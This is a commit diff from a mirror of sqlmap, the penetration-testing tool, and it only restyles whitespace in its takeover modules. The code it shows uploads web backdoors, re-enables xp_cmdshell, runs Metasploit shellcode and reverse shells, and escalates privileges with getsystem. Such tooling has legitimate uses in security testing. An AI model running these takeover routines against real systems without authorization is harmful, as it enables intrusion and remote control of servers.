PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-16 04:39:06 +00:00
Code Issues Projects Releases Wiki Activity

Minor code restyling

Browse Source
This commit is contained in:
Bernardo Damele
2011-04-30 13:20:05 +00:00
parent 983546d6bf
commit f56d135438
86 changed files with 804 additions and 804 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
lib/takeover/abstraction.py
View File

@@ -70,8 +70,8 @@ class Abstraction(Web, UDF, xp_cmdshell):
getOutput = None
if not self.alwaysRetrieveCmdOutput:
message = "do you want to retrieve the command standard "
message += "output? [Y/n/a] "
message = "do you want to retrieve the command standard "
message += "output? [Y/n/a] "
getOutput = readInput(message, default="Y")
if getOutput in ("a", "A"):
@@ -89,19 +89,19 @@ class Abstraction(Web, UDF, xp_cmdshell):
def shell(self):
if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
infoMsg = "calling OS shell. To quit type "
infoMsg = "calling OS shell. To quit type "
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
else:
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
infoMsg = "going to use injected sys_eval and sys_exec "
infoMsg = "going to use injected sys_eval and sys_exec "
infoMsg += "user-defined functions for operating system "
infoMsg += "command execution"
logger.info(infoMsg)
elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
infoMsg = "going to use xp_cmdshell extended procedure for "
infoMsg = "going to use xp_cmdshell extended procedure for "
infoMsg += "operating system command execution"
logger.info(infoMsg)
@@ -109,7 +109,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
errMsg = "feature not yet implemented for the back-end DBMS"
raise sqlmapUnsupportedFeatureException, errMsg
infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows")
infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows")
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
@@ -148,7 +148,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
self.checkDbmsOs(detailed)
if mandatory and not self.isDba():
warnMsg = "the functionality requested might not work because "
warnMsg = "the functionality requested might not work because "
warnMsg += "the session user is not a database administrator"
logger.warn(warnMsg)

14
lib/takeover/icmpsh.py
View File

@@ -30,11 +30,11 @@ class ICMPsh:
"""
def __initVars(self):
self.lhostStr = None
self.rhostStr = None
self.localIP = getLocalIP()
self.remoteIP = getRemoteIP()
self.__icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe"))
self.lhostStr = None
self.rhostStr = None
self.localIP = getLocalIP()
self.remoteIP = getRemoteIP()
self.__icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe"))
def __selectRhost(self):
message = "which is the back-end DBMS address? [%s] " % self.remoteIP
@@ -59,7 +59,7 @@ class ICMPsh:
icmpshmaster(self.lhostStr, self.rhostStr)
def __runIcmpshSlaveRemote(self):
infoMsg = "running icmpsh slave remotely"
infoMsg = "running icmpsh slave remotely"
logger.info(infoMsg)
cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self.__icmpslaveRemote, self.lhostStr)
@@ -90,7 +90,7 @@ class ICMPsh:
self.__runIcmpshSlaveRemote()
self.__runIcmpshMaster()
debugMsg = "icmpsh master exited"
debugMsg = "icmpsh master exited"
logger.debug(debugMsg)
time.sleep(1)

80
lib/takeover/metasploit.py
View File

@@ -50,22 +50,22 @@ class Metasploit:
"""
def __initVars(self):
self.connectionStr = None
self.lhostStr = None
self.rhostStr = None
self.portStr = None
self.payloadStr = None
self.encoderStr = None
self.connectionStr = None
self.lhostStr = None
self.rhostStr = None
self.portStr = None
self.payloadStr = None
self.encoderStr = None
self.payloadConnStr = None
self.resourceFile = None
self.localIP = getLocalIP()
self.remoteIP = getRemoteIP()
self.__msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
self.__msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole"))
self.__msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
self.__msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
self.resourceFile = None
self.localIP = getLocalIP()
self.remoteIP = getRemoteIP()
self.__msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
self.__msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole"))
self.__msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
self.__msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
self.__msfPayloadsList = {
self.__msfPayloadsList = {
"windows": {
1: ( "Meterpreter (default)", "windows/meterpreter" ),
2: ( "Shell", "windows/shell" ),
@@ -88,7 +88,7 @@ class Metasploit:
}
}
self.__msfEncodersList = {
self.__msfEncodersList = {
"windows": {
1: ( "No Encoder", "generic/none" ),
2: ( "Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed" ),
@@ -106,14 +106,14 @@ class Metasploit:
}
}
self.__msfSMBPortsList = {
self.__msfSMBPortsList = {
"windows": {
1: ( "139/TCP", "139" ),
2: ( "445/TCP (default)", "445" ),
}
}
self.__portData = {
self.__portData = {
"bind": "remote port number",
"reverse": "local port number",
}
@@ -175,7 +175,7 @@ class Metasploit:
def __selectPayload(self):
if Backend.isOs(OS.WINDOWS) and conf.privEsc:
infoMsg = "forcing Metasploit payload to Meterpreter because "
infoMsg = "forcing Metasploit payload to Meterpreter because "
infoMsg += "it is the only payload that can be used to "
infoMsg += "escalate privileges, either via 'incognito' "
infoMsg += "extension or via 'getsystem' command"
@@ -190,7 +190,7 @@ class Metasploit:
choose = False
if Backend.getIdentifiedDbms() == DBMS.MYSQL:
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, it is likely that the the VNC "
debugMsg += "injection will be successful"
logger.debug(debugMsg)
@@ -198,7 +198,7 @@ class Metasploit:
elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
choose = True
warnMsg = "by default PostgreSQL on Windows runs as "
warnMsg = "by default PostgreSQL on Windows runs as "
warnMsg += "postgres user, it is unlikely that the VNC "
warnMsg += "injection will be successful"
logger.warn(warnMsg)
@@ -206,14 +206,14 @@ class Metasploit:
elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
choose = True
warnMsg = "it is unlikely that the VNC injection will be "
warnMsg = "it is unlikely that the VNC injection will be "
warnMsg += "successful because usually Microsoft SQL Server "
warnMsg += "%s runs as Network Service " % Backend.getVersion()
warnMsg += "or the Administrator is not logged in"
logger.warn(warnMsg)
if choose:
message = "what do you want to do?\n"
message = "what do you want to do?\n"
message += "[1] Give it a try anyway\n"
message += "[2] Fall back to Meterpreter payload (default)\n"
message += "[3] Fall back to Shell payload"
@@ -289,12 +289,12 @@ class Metasploit:
return self.__skeletonSelection("connection type", self.__msfConnectionsList)
def __prepareIngredients(self, encode=True):
self.connectionStr = self.__selectConnection()
self.lhostStr = self.__selectLhost()
self.rhostStr = self.__selectRhost()
self.portStr = self.__selectPort()
self.payloadStr = self.__selectPayload()
self.encoderStr = self.__selectEncoder(encode)
self.connectionStr = self.__selectConnection()
self.lhostStr = self.__selectLhost()
self.rhostStr = self.__selectRhost()
self.portStr = self.__selectPort()
self.payloadStr = self.__selectPayload()
self.encoderStr = self.__selectEncoder(encode)
if self.payloadStr == "linux/x86/shell":
self.payloadConnStr = "%s_%s" % (self.payloadStr, self.connectionStr)
@@ -302,7 +302,7 @@ class Metasploit:
self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)
def __forgeMsfCliCmd(self, exitfunc="process"):
self.__cliCmd = "%s multi/handler PAYLOAD=%s" % (self.__msfCli, self.payloadConnStr)
self.__cliCmd = "%s multi/handler PAYLOAD=%s" % (self.__msfCli, self.payloadConnStr)
self.__cliCmd += " EXITFUNC=%s" % exitfunc
self.__cliCmd += " LPORT=%s" % self.portStr
#self.__cliCmd += " ExitOnSession=true"
@@ -327,7 +327,7 @@ class Metasploit:
self.__prepareIngredients(encode=False)
self.__resource = "use windows/smb/smb_relay\n"
self.__resource = "use windows/smb/smb_relay\n"
self.__resource += "set SRVHOST %s\n" % self.lhostStr
self.__resource += "set SRVPORT %s\n" % self.__selectSMBPort()
self.__resource += "set PAYLOAD %s\n" % self.payloadConnStr
@@ -348,7 +348,7 @@ class Metasploit:
self.resourceFp.close()
def __forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
self.__payloadCmd = "%s %s" % (self.__msfPayload, self.payloadConnStr)
self.__payloadCmd = "%s %s" % (self.__msfPayload, self.payloadConnStr)
self.__payloadCmd += " EXITFUNC=%s" % exitfunc
self.__payloadCmd += " LPORT=%s" % self.portStr
#self.__payloadCmd += " ExitOnSession=true"
@@ -370,7 +370,7 @@ class Metasploit:
def __runMsfCli(self, exitfunc):
self.__forgeMsfCliCmd(exitfunc)
infoMsg = "running Metasploit Framework 3 command line "
infoMsg = "running Metasploit Framework 3 command line "
infoMsg += "interface locally, please wait.."
logger.info(infoMsg)
@@ -385,14 +385,14 @@ class Metasploit:
self.__msfConsoleProc = execute(self.__consoleCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def __runMsfShellcodeRemote(self):
infoMsg = "running Metasploit Framework 3 shellcode "
infoMsg = "running Metasploit Framework 3 shellcode "
infoMsg += "remotely via UDF 'sys_bineval', please wait.."
logger.info(infoMsg)
self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval")
def __runMsfShellcodeRemoteViaSexec(self):
infoMsg = "running Metasploit Framework 3 shellcode remotely "
infoMsg = "running Metasploit Framework 3 shellcode remotely "
infoMsg += "via shellcodeexec, please wait.."
logger.info(infoMsg)
@@ -421,14 +421,14 @@ class Metasploit:
if conf.privEsc:
print
infoMsg = "trying to escalate privileges using Meterpreter "
infoMsg = "trying to escalate privileges using Meterpreter "
infoMsg += "'getsystem' command which tries different "
infoMsg += "techniques, including kitrap0d"
logger.info(infoMsg)
proc.stdin.write("getsystem\n")
infoMsg = "displaying the list of Access Tokens availables. "
infoMsg = "displaying the list of Access Tokens availables. "
infoMsg += "Choose which user you want to impersonate by "
infoMsg += "using incognito's command 'impersonate_token' if "
infoMsg += "'getsystem' does not success to elevate privileges"
@@ -469,7 +469,7 @@ class Metasploit:
blockingWriteToFD(sys.stdout.fileno(), out)
# For --os-pwn and --os-bof
pwnBofCond = self.connectionStr.startswith("reverse")
pwnBofCond = self.connectionStr.startswith("reverse")
pwnBofCond &= "Starting the payload handler" in out
# For --os-smbrelay
@@ -574,7 +574,7 @@ class Metasploit:
if self.connectionStr.startswith("bind"):
func()
debugMsg = "Metasploit Framework 3 command line interface exited "
debugMsg = "Metasploit Framework 3 command line interface exited "
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, func)
logger.debug(debugMsg)
@@ -596,7 +596,7 @@ class Metasploit:
self.__runMsfConsole()
debugMsg = "Metasploit Framework 3 console exited with return "
debugMsg = "Metasploit Framework 3 console exited with return "
debugMsg += "code %s" % self.__controlMsfCmd(self.__msfConsoleProc, self.uncPathRequest)
logger.debug(debugMsg)
@@ -608,6 +608,6 @@ class Metasploit:
if self.connectionStr.startswith("bind"):
self.spHeapOverflow()
debugMsg = "Metasploit Framework 3 command line interface exited "
debugMsg = "Metasploit Framework 3 command line interface exited "
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, self.spHeapOverflow)
logger.debug(debugMsg)

20
lib/takeover/registry.py
View File

@@ -19,14 +19,14 @@ class Registry:
"""
def __initVars(self, regKey, regValue, regType=None, regData=None, parse=False):
self.__regKey = regKey
self.__regValue = regValue
self.__regType = regType
self.__regData = regData
self.__regKey = regKey
self.__regValue = regValue
self.__regType = regType
self.__regData = regData
self.__randStr = randomStr(lowercase=True)
self.__randStr = randomStr(lowercase=True)
self.__batPathRemote = "%s/tmpr%s.bat" % (conf.tmpPath, self.__randStr)
self.__batPathLocal = os.path.join(conf.outputPath, "tmpr%s.bat" % self.__randStr)
self.__batPathLocal = os.path.join(conf.outputPath, "tmpr%s.bat" % self.__randStr)
if parse:
readParse = "FOR /F \"tokens=*\" %%A IN ('REG QUERY \"" + self.__regKey + "\" /v \"" + self.__regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n"
@@ -38,12 +38,12 @@ class Registry:
readParse
)
self.__batAdd = (
self.__batAdd = (
"@ECHO OFF\r\n",
"REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self.__regKey, self.__regValue, self.__regType, self.__regData)
)
self.__batDel = (
self.__batDel = (
"@ECHO OFF\r\n",
"REG DELETE \"%s\" /v \"%s\" /f" % (self.__regKey, self.__regValue)
)
@@ -97,7 +97,7 @@ class Registry:
self.__initVars(regKey, regValue, regType, regData)
self.__createRemoteBatchFile()
debugMsg = "adding registry key value '%s' " % self.__regValue
debugMsg = "adding registry key value '%s' " % self.__regValue
debugMsg += "to registry key '%s'" % self.__regKey
logger.debug(debugMsg)
@@ -110,7 +110,7 @@ class Registry:
self.__initVars(regKey, regValue)
self.__createRemoteBatchFile()
debugMsg = "deleting registry key value '%s' " % self.__regValue
debugMsg = "deleting registry key value '%s' " % self.__regValue
debugMsg += "from registry key '%s'" % self.__regKey
logger.debug(debugMsg)

58
lib/takeover/udf.py
View File

@@ -35,14 +35,14 @@ class UDF:
"""
def __init__(self):
self.createdUdf = set()
self.udfs = {}
self.createdUdf = set()
self.udfs = {}
self.udfToCreate = set()
def __askOverwriteUdf(self, udf):
message = "UDF '%s' already exists, do you " % udf
message = "UDF '%s' already exists, do you " % udf
message += "want to overwrite it? [y/N] "
output = readInput(message, default="N")
output = readInput(message, default="N")
if output and output[0] in ("y", "Y"):
return True
@@ -61,7 +61,7 @@ class UDF:
return False
def udfCheckAndOverwrite(self, udf):
exists = self.__checkExistUdf(udf)
exists = self.__checkExistUdf(udf)
overwrite = True
if exists:
@@ -78,7 +78,7 @@ class UDF:
def udfExecCmd(self, cmd, silent=False, udfName=None):
if udfName is None:
cmd = "'%s'" % cmd
cmd = "'%s'" % cmd
udfName = "sys_exec"
cmd = unescaper.unescape(cmd)
@@ -87,7 +87,7 @@ class UDF:
def udfEvalCmd(self, cmd, first=None, last=None, udfName=None):
if udfName is None:
cmd = "'%s'" % cmd
cmd = "'%s'" % cmd
udfName = "sys_eval"
cmd = unescaper.unescape(cmd)
@@ -167,7 +167,7 @@ class UDF:
self.checkDbmsOs()
if not self.isDba():
warnMsg = "the functionality requested might not work because "
warnMsg = "the functionality requested might not work because "
warnMsg += "the session user is not a database administrator"
logger.warn(warnMsg)
@@ -193,19 +193,19 @@ class UDF:
raise sqlmapMissingMandatoryOptionException(errMsg)
elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS):
errMsg = "you provided a shared object as shared library, but "
errMsg = "you provided a shared object as shared library, but "
errMsg += "the database underlying operating system is Windows"
raise sqlmapMissingMandatoryOptionException(errMsg)
elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX):
errMsg = "you provided a dynamic-link library as shared library, "
errMsg = "you provided a dynamic-link library as shared library, "
errMsg += "but the database underlying operating system is Linux"
raise sqlmapMissingMandatoryOptionException(errMsg)
self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0]
self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1]
self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1]
msg = "how many user-defined functions do you want to create "
msg = "how many user-defined functions do you want to create "
msg += "from the shared library? "
while True:
@@ -228,7 +228,7 @@ class UDF:
for x in range(0, udfCount):
while True:
msg = "what is the name of the UDF number %d? " % (x + 1)
msg = "what is the name of the UDF number %d? " % (x + 1)
udfName = readInput(msg)
if udfName:
@@ -245,8 +245,8 @@ class UDF:
self.udfs[udfName]["input"] = []
default = 1
msg = "how many input parameters takes UDF "
msg += "'%s'? (default: %d) " % (udfName, default)
msg = "how many input parameters takes UDF "
msg += "'%s'? (default: %d) " % (udfName, default)
while True:
parCount = readInput(msg, default=default)
@@ -262,8 +262,8 @@ class UDF:
logger.warn("invalid value, only digits >= 0 are allowed")
for y in range(0, parCount):
msg = "what is the data-type of input parameter "
msg += "number %d? (default: %s) " % ((y + 1), defaultType)
msg = "what is the data-type of input parameter "
msg += "number %d? (default: %s) " % ((y + 1), defaultType)
while True:
parType = readInput(msg, default=defaultType)
@@ -275,7 +275,7 @@ class UDF:
self.udfs[udfName]["input"].append(parType)
break
msg = "what is the data-type of the return "
msg = "what is the data-type of the return "
msg += "value? (default: %s) " % defaultType
while True:
@@ -289,8 +289,8 @@ class UDF:
self.udfInjectCore(self.udfs)
msg = "do you want to call your injected user-defined "
msg += "functions now? [Y/n/q] "
msg = "do you want to call your injected user-defined "
msg += "functions now? [Y/n/q] "
choice = readInput(msg, default="Y")
if choice[0] in ( "n", "N" ):
@@ -302,7 +302,7 @@ class UDF:
while True:
udfList = []
msg = "which UDF do you want to call?"
msg = "which UDF do you want to call?"
for udf in self.udfs.keys():
udfList.append(udf)
@@ -321,16 +321,16 @@ class UDF:
elif isinstance(choice, int) and choice > 0 and choice <= len(udfList):
break
else:
warnMsg = "invalid value, only digits >= 1 and "
warnMsg = "invalid value, only digits >= 1 and "
warnMsg += "<= %d are allowed" % len(udfList)
logger.warn(warnMsg)
cmd = ""
count = 1
cmd = ""
count = 1
udfToCall = udfList[choice - 1]
for inp in self.udfs[udfToCall]["input"]:
msg = "what is the value of the parameter number "
msg = "what is the value of the parameter number "
msg += "%d (data-type: %s)? " % (count, inp)
while True:
@@ -348,9 +348,9 @@ class UDF:
count += 1
cmd = cmd[:-1]
msg = "do you want to retrieve the return value of the "
msg += "UDF? [Y/n] "
cmd = cmd[:-1]
msg = "do you want to retrieve the return value of the "
msg += "UDF? [Y/n] "
choice = readInput(msg, default="Y")
if choice[0] in ("y", "Y"):
@@ -363,7 +363,7 @@ class UDF:
else:
self.udfExecCmd(cmd, udfName=udfToCall, silent=True)
msg = "do you want to call this or another injected UDF? [Y/n] "
msg = "do you want to call this or another injected UDF? [Y/n] "
choice = readInput(msg, default="Y")
if choice[0] not in ("y", "Y"):

28
lib/takeover/web.py
View File

@@ -46,11 +46,11 @@ class Web:
"""
def __init__(self):
self.webApi = None
self.webBaseUrl = None
self.webApi = None
self.webBaseUrl = None
self.webBackdoorUrl = None
self.webStagerUrl = None
self.webDirectory = None
self.webStagerUrl = None
self.webDirectory = None
def webBackdoorRunCmd(self, cmd):
if self.webBackdoorUrl is None:
@@ -61,7 +61,7 @@ class Web:
if not cmd:
cmd = conf.osCmd
cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
page, _ = Request.getPage(url=cmdUrl, direct=True, silent=True)
if page is not None:
@@ -96,7 +96,7 @@ class Web:
page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)
if "File uploaded" not in page:
warnMsg = "unable to upload the backdoor through "
warnMsg = "unable to upload the backdoor through "
warnMsg += "the file stager on '%s'" % directory
logger.warn(warnMsg)
return False
@@ -176,7 +176,7 @@ class Web:
self.webApi = choices[int(choice) - 1]
break
kb.docRoot = getDocRoot()
kb.docRoot = getDocRoot()
directories = getDirs()
directories = list(directories)
directories.sort()
@@ -238,18 +238,18 @@ class Web:
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath)
self.webStagerUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), stagerName)
uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
if "sqlmap file uploader" not in uplPage:
if localPath not in warned:
warnMsg = "unable to upload the file stager "
warnMsg = "unable to upload the file stager "
warnMsg += "on '%s'" % localPath
logger.warn(warnMsg)
warned.add(localPath)
continue
elif "<%" in uplPage or "<?" in uplPage:
warnMsg = "file stager uploaded "
warnMsg = "file stager uploaded "
warnMsg += "on '%s' but not dynamically interpreted" % localPath
logger.warn(warnMsg)
continue
@@ -258,7 +258,7 @@ class Web:
kb.data.__EVENTVALIDATION = extractRegexResult(r"__EVENTVALIDATION[^>]+value=\"(?P<result>[^\"]+)\"", uplPage, re.I)
kb.data.__VIEWSTATE = extractRegexResult(r"__VIEWSTATE[^>]+value=\"(?P<result>[^\"]+)\"", uplPage, re.I)
infoMsg = "the file stager has been successfully uploaded "
infoMsg = "the file stager has been successfully uploaded "
infoMsg += "on '%s' ('%s')" % (localPath, self.webStagerUrl)
logger.info(infoMsg)
@@ -287,12 +287,12 @@ class Web:
else:
if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath):
warnMsg = "backdoor has not been successfully uploaded "
warnMsg = "backdoor has not been successfully uploaded "
warnMsg += "with file stager probably because of "
warnMsg += "lack of write permission."
logger.warn(warnMsg)
message = "do you want to try the same method used "
message = "do you want to try the same method used "
message += "for the file stager? [y/N] "
getOutput = readInput(message, default="N")
@@ -304,7 +304,7 @@ class Web:
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = localPath
infoMsg = "the backdoor has probably been successfully "
infoMsg = "the backdoor has probably been successfully "
infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory
infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl
logger.info(infoMsg)

16
lib/takeover/xp_cmdshell.py
View File

@@ -56,11 +56,11 @@ class xp_cmdshell:
inject.goStacked(cmd)
def __xpCmdshellConfigure2005(self, mode):
debugMsg = "configuring xp_cmdshell using sp_configure "
debugMsg = "configuring xp_cmdshell using sp_configure "
debugMsg += "stored procedure"
logger.debug(debugMsg)
cmd = "EXEC master..sp_configure 'show advanced options', 1; "
cmd = "EXEC master..sp_configure 'show advanced options', 1; "
cmd += "RECONFIGURE WITH OVERRIDE; "
cmd += "EXEC master..sp_configure 'xp_cmdshell', %d " % mode
cmd += "RECONFIGURE WITH OVERRIDE; "
@@ -69,12 +69,12 @@ class xp_cmdshell:
return cmd
def __xpCmdshellConfigure2000(self, mode):
debugMsg = "configuring xp_cmdshell using sp_addextendedproc "
debugMsg = "configuring xp_cmdshell using sp_addextendedproc "
debugMsg += "stored procedure"
logger.debug(debugMsg)
if mode == 1:
cmd = "EXEC master..sp_addextendedproc 'xp_cmdshell', "
cmd = "EXEC master..sp_addextendedproc 'xp_cmdshell', "
cmd += "@dllname='xplog70.dll'"
else:
cmd = "EXEC master..sp_dropextendedproc 'xp_cmdshell'"
@@ -134,7 +134,7 @@ class xp_cmdshell:
def xpCmdshellInit(self):
if kb.xpCmdshellAvailable is False:
infoMsg = "checking if xp_cmdshell extended procedure is "
infoMsg = "checking if xp_cmdshell extended procedure is "
infoMsg += "available, please wait.."
logger.info(infoMsg)
@@ -145,10 +145,10 @@ class xp_cmdshell:
kb.xpCmdshellAvailable = True
else:
message = "xp_cmdshell extended procedure does not seem to "
message = "xp_cmdshell extended procedure does not seem to "
message += "be available. Do you want sqlmap to try to "
message += "re-enable it? [Y/n] "
choice = readInput(message, default="Y")
choice = readInput(message, default="Y")
if not choice or choice in ("y", "Y"):
self.__xpCmdshellConfigure(1)
@@ -169,7 +169,7 @@ class xp_cmdshell:
kb.xpCmdshellAvailable = True
else:
warnMsg = "xp_cmdshell creation failed, probably "
warnMsg = "xp_cmdshell creation failed, probably "
warnMsg += "because sp_OACreate is disabled"
logger.warn(warnMsg)